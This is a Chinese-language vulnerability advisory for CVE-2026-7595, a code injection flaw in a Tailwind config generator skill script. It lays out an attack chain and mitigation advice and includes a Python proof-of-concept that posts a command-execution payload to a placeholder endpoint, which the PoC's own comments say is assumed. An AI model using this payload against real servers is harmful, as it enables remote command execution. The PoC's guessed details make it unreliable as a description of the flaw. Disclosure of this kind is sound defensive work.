IPBUF安全漏洞报告
English
CVE-2026-7595 CVSS 6.3 中危

CVE-2026-7595 ui-ux-pro-max-skill代码注入漏洞

披露日期: 2026-05-01

漏洞信息

漏洞编号
CVE-2026-7595
漏洞类型
代码注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
nextlevelbuilder/ui-ux-pro-max-skill

相关标签

代码注入RCECVE-2026-7595ui-ux-pro-max-skillPython

漏洞概述

nextlevelbuilder/ui-ux-pro-max-skill 2.5.0及之前版本存在严重的代码注入漏洞。该漏洞位于Tailwind Config Generator组件的_format_plugins函数中,由于未对输入进行严格过滤,攻击者可远程注入并执行恶意代码。目前官方尚未响应修复请求,且利用代码已公开。

技术细节

该漏洞源于文件.claude/skills/ui-styling/scripts/tailwind_config_gen.py中的_format_plugins函数存在逻辑缺陷。该函数在处理插件配置时,直接将用户可控的数据传递到代码执行上下文中,未进行沙箱隔离或字符转义。攻击者可以通过构造包含Python语法的恶意数据包发送至服务器,利用该函数触发代码注入。由于CVSS向量显示攻击无需用户交互且权限要求较低,攻击者可轻易地获取服务器执行权限,导致系统面临数据泄露、篡改及服务中断的风险。

攻击链分析

STEP 1
侦察
攻击者识别出目标系统使用了nextlevelbuilder/ui-ux-pro-max-skill 2.5.0或更早版本。
STEP 2
构造载荷
攻击者利用Python语法构造恶意代码片段,旨在通过_format_plugins函数执行系统命令。
STEP 3
发送请求
攻击者将包含恶意载荷的数据包通过网络发送至受影响组件的API接口。
STEP 4
代码执行
服务器端解析请求并调用_format_plugins函数,导致恶意代码在服务器上下文中执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_url): """ Proof of Concept for CVE-2026-7595 Exploits code injection in _format_plugins function. """ # Malicious payload to execute a command (e.g., whoami) # Assuming the input is evaluated directly in a Python context payload = "__import__('os').popen('whoami').read()" # Construct the data payload data = { "plugin_config": payload } try: print(f"[*] Sending payload to {target_url}...") response = requests.post(target_url, json=data, timeout=10) if response.status_code == 200: print("[+] Payload sent successfully.") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with actual vulnerable endpoint target = "http://127.0.0.1:8000/api/configure" exploit(target)

影响范围

nextlevelbuilder/ui-ux-pro-max-skill <= 2.5.0

防御指南

临时缓解措施
由于官方尚未发布修复补丁,建议在服务器端实施严格的网络访问控制,限制对Tailwind配置生成接口的外部访问。同时,检查并监控相关日志文件,是否存在异常的代码执行行为。对于关键系统,建议暂时回退至安全版本或移除该组件。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表